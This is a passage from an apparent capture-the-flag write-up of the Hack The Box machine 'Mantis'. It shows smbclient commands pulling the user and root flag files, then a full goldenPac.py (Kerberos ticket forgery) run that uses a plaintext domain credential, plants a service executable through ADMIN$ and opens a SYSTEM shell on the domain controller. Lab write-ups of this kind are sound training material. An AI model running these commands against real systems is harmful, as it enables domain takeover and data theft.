Recovery DHS 0 Fri Sep 1 01:39:12 2017
System Volume Information DHS 0 Thu Aug 31 20:02:33 2017
Users DR 0 Fri Sep 1 10:19:01 2017
Windows D 0 Sat Dec 23 22:31:49 2017
5480959 blocks of size 4096. 288821 blocks available
I can grab both flags:
1
2
3
4
5
smb: \> get Users\james\desktop\user.txt
getting file \Users\james\desktop\user.txt of size 32 as Users\james\desktop\user.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> get Users\administrator\desktop\root.txt
getting file \Users\administrator\desktop\root.txt of size 32 as Users\administrator\desktop\root.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
____ $/usr/share/doc/python3-impacket/examples/goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file AHYRyTll.exe
[*] Opening SVCManager on mantis.....
[*] Creating service LPnK on mantis.....
[*] Starting service LPnK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ifconfig
b"'ifconfig' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::41a8:e26c:362f:e7d6
Link-local IPv6 Address . . . . . : fe80::41a8:e26c:362f:e7d6%11
IPv4 Address. . . . . . . . . . . : 10.129.167.60
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c35e%11
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb